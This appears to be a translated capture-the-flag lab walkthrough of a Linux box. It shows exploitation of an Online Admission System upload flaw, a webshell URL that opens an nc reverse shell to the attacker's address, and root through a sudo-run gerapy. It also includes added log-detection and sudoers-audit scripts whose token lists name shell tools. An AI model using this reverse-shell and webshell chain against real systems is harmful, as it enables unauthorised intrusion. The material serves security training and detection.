OSCP lab
Lab overview
Information gathering
Host discovery
nmap -sn 192.168.31.0/24
Port scan
└─# nmap -sV -A -p- -T4 192.168.31.142
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-14 22:58 EST
Nmap scan report for 192.168.31.142
Host is up (0.00095s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 8e:ee:da:29:f1:ae:03:a5:c3:7e:45:84:c7:86:67:ce (RSA)
| 256 f8:1c:ef:96:7b:ae:74:21:6c:9f:06:9b:20:0a:d8:56 (ECDSA)
|_ 256 19:fc:94:32:41:9d:43:6f:52:c5:ba:5a:f0:83:b4:5b (ED25519)
80/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
| http-git:
| 192.168.31.142:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Remotes:
|_ https://github.com/rskoolrash/Online-Admission-System
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
MAC Address: 08:00:27:E1:B2:29 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Directory scan
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.31.230 -x html,php,txt -e
The exposed .git directory gives us the site's source code.
From the source we learn about oas.sql and download it, but the account credentials inside it have been changed.
Gaining access
Here we go straight to the known historical vulnerability in Online Admission System.
Looking at the exploit, the page it abuses is exactly the one below:
http://192.168.31.142/documents.php
After uploading a webshell we get a shell straight away:
http://192.168.31.142/studentpic/123.php?cmd=nc%20192.168.31.181%208989%20-c%20/bin/bash
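As an added example that is not part of the original write-up, the Python script below shows how a defender could pick up both web-side findings from this box in nginx access logs: requests for the exposed .git directory, and requests that run a PHP file under the studentpic upload folder with a shell command in the query string. The log lines are constructed to mirror the requests described above (they are not real logs from the machine), and the upload-directory, extension, parameter-name and token lists are assumptions for the demonstration.

```python
import re
from urllib.parse import urlsplit, unquote, parse_qsl

# Constructed sample lines in nginx "combined" format (not real logs from the box).
SAMPLE_LOG = """\
192.168.31.181 - - [14/Feb/2024:23:01:12 -0500] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "Mozilla/5.0"
192.168.31.181 - - [14/Feb/2024:23:05:40 -0500] "POST /documents.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.31.181 - - [14/Feb/2024:23:06:02 -0500] "GET /studentpic/123.php?cmd=nc%20192.168.31.181%208989%20-c%20/bin/bash HTTP/1.1" 200 0 "-" "curl/8.4.0"
192.168.31.50 - - [14/Feb/2024:23:06:30 -0500] "GET /studentpic/photo.jpg HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
192.168.31.50 - - [14/Feb/2024:23:07:00 -0500] "GET /index.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# Fields of the combined format we need: client IP, timestamp, method, request target, status, size.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

UPLOAD_DIRS = ("/studentpic/",)                       # upload location named in the write-up
SCRIPT_EXTS = (".php", ".phtml", ".phar", ".php5")    # assumption: extensions PHP-FPM may execute
SHELL_PARAMS = {"cmd", "exec", "command", "c"}        # assumption: common webshell parameter names
SHELL_TOKENS = ("nc ", "bash", "/bin/sh", "sh -", "python", "perl", "wget ", "curl ")


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = unquote(parts.path)   # decoded path, e.g. /studentpic/123.php
    rec["query"] = parts.query          # raw query string, decoded later per parameter
    return rec


def analyze_request(rec):
    """Return a list of detection tags for one parsed request."""
    tags = []
    path = rec["path"]
    lowered = path.lower()
    # 1. Source-code exposure: any request into the repository metadata directory.
    if lowered == "/.git" or lowered.startswith("/.git/"):
        tags.append("git-exposure")
    # 2. A script extension being served from a directory that should only hold images.
    if any(lowered.startswith(d) for d in UPLOAD_DIRS) and lowered.endswith(SCRIPT_EXTS):
        tags.append("script-in-upload-dir")
    # 3. A shell-like parameter whose decoded value looks like a command line.
    for key, value in parse_qsl(rec["query"], keep_blank_values=True):
        if key.lower() in SHELL_PARAMS and any(tok in value.lower() for tok in SHELL_TOKENS):
            tags.append("webshell-command")
            break
    return tags


def scan_log(text):
    """Scan a whole log; return (client_ip, path, tags) for every flagged request."""
    alerts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = analyze_request(rec)
        if tags:
            alerts.append((rec["ip"], rec["path"], tags))
    return alerts


if __name__ == "__main__":
    for ip, path, tags in scan_log(SAMPLE_LOG):
        print(f"{ip} {path} -> {', '.join(tags)}")
```

On the sample input the first line is flagged as git-exposure and the third as both script-in-upload-dir and webshell-command; the legitimate image and index requests produce nothing. The same two conditions are the ones to close on the server side: deny requests to /.git in the nginx configuration and make sure the upload directory is never handed to PHP-FPM.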
Privilege escalation
In the html directory we find a hidden file containing a password. Using it to su to the sandra account succeeds, and we read user.txt.
Escalating to root through gerapy
To use this exploit we first have to start the gerapy service.
Project: https://github.com/Gerapy/Gerapy
^Csandra@MiWiFi-R4ACv2-srv:~$ sudo gerapy init
sudo: unable to resolve host MiWiFi-R4ACv2-srv: No address associated with hostname
Initialized workspace gerapy
sandra@MiWiFi-R4ACv2-srv:~$ cd gerapy/
sandra@MiWiFi-R4ACv2-srv:~/gerapy$ sudo gerapy migrate
sudo: unable to resolve host MiWiFi-R4ACv2-srv: No address associated with hostname
Operations to perform:
Apply all migrations: admin, auth, authtoken, contenttypes, core, django_apscheduler, sessions
Running migrations:
Applying contenttypes.0001_initial... OK
Applying auth.0001_initial... OK
Applying admin.0001_initial... OK
Applying admin.0002_logentry_remove_auto_add... OK
Applying admin.0003_logentry_add_action_flag_choices... OK
Applying contenttypes.0002_remove_content_type_name... OK
...
Applying sessions.0001_initial... OK
sandra@MiWiFi-R4ACv2-srv:~/gerapy$
Here we also have to initialize a project named "gerapy".
Then we run it as root, so that the remote command execution exploit gives us root. Before that, I created a superuser account.
After starting it, the gerapy service is reachable.
Since the credentials in the exploit are likewise login/passwd, nothing needs to be changed. Running it escalates us to root.
End
Originally published on the WeChat public account 贝雷帽SEC: 【OSCP】university
Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site assumes no legal or joint liability. For questions, contact us by e-mail (a corporate or otherwise valid mailbox is recommended to avoid filtering; contact details are on the home page).
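As an added example that is not part of the original write-up: the root escalation works because sudo lets sandra start gerapy as root, so the application's remote command execution inherits root privileges. The Python audit below parses a constructed sudoers file (not the lab machine's real one; it only mirrors the kind of grant the walkthrough relies on) and flags every rule that lets a non-root user run something as root, rating grants of ALL as critical and grants of a service launcher such as gerapy as high. The SERVICE_LAUNCHERS list and the sample rules are assumptions.

```python
import re

# Constructed sudoers content for demonstration only; NOT the box's real /etc/sudoers.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
sandra  ALL=(root) NOPASSWD: /usr/local/bin/gerapy
backup  ALL=(root) /usr/bin/rsync -a /srv/ /mnt/backup/
"""

# user_or_group  hosts = (runas_user[:runas_group]) [TAG:...] command[, command...]
RULE_RE = re.compile(
    r'^(?P<who>[^\s#]\S*)\s+(?P<hosts>\S+)\s*=\s*'
    r'(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$'
)
# Leading tag block such as "NOPASSWD: SETENV: ".
TAG_RE = re.compile(
    r'^(?:(?:NO)?(?:PASSWD|EXEC|SETENV|MAIL|FOLLOW|LOG_INPUT|LOG_OUTPUT|INTERCEPT):\s*)+'
)

# Assumption: binaries that start a long-running service or interpreter. Any command
# execution bug in them runs with whatever user sudo started them as.
SERVICE_LAUNCHERS = {"gerapy", "scrapyd", "gunicorn", "flask", "python", "python3", "node", "php"}


def parse_sudoers(text):
    """Parse user/group specification lines into dicts; skip Defaults, comments, blanks."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        # No (runas) clause means the command runs as root.
        runas = (m.group("runas") or "root").split(":")[0] or "root"
        rest = m.group("rest")
        tags = []
        tag_match = TAG_RE.match(rest)
        if tag_match:
            tags = [t for t in tag_match.group(0).replace(" ", "").split(":") if t]
            rest = rest[tag_match.end():]
        cmds = [c.strip() for c in rest.split(",") if c.strip()]
        rules.append({"who": m.group("who"), "runas": runas, "tags": tags, "cmds": cmds})
    return rules


def audit(rules):
    """Flag rules that let a non-root principal run commands as root."""
    findings = []
    for r in rules:
        if r["who"] == "root" or r["runas"] not in ("root", "ALL"):
            continue
        for cmd in r["cmds"]:
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                severity = "critical"      # unrestricted root
            elif binary in SERVICE_LAUNCHERS:
                severity = "high"          # a service started as root: its RCE is root RCE
            else:
                severity = "review"        # specific command; check it cannot be abused
            findings.append({"who": r["who"], "cmd": cmd, "severity": severity,
                             "nopasswd": "NOPASSWD" in r["tags"]})
    return findings


if __name__ == "__main__":
    for f in audit(parse_sudoers(SAMPLE_SUDOERS)):
        flag = " (NOPASSWD)" if f["nopasswd"] else ""
        print(f"[{f['severity']}] {f['who']} may run as root: {f['cmd']}{flag}")
```

The fix the audit points at is the same one the write-up's escalation depends on being absent: run gerapy under an unprivileged service account instead of granting it through sudo, and change its default login/passwd credentials before exposing the web interface.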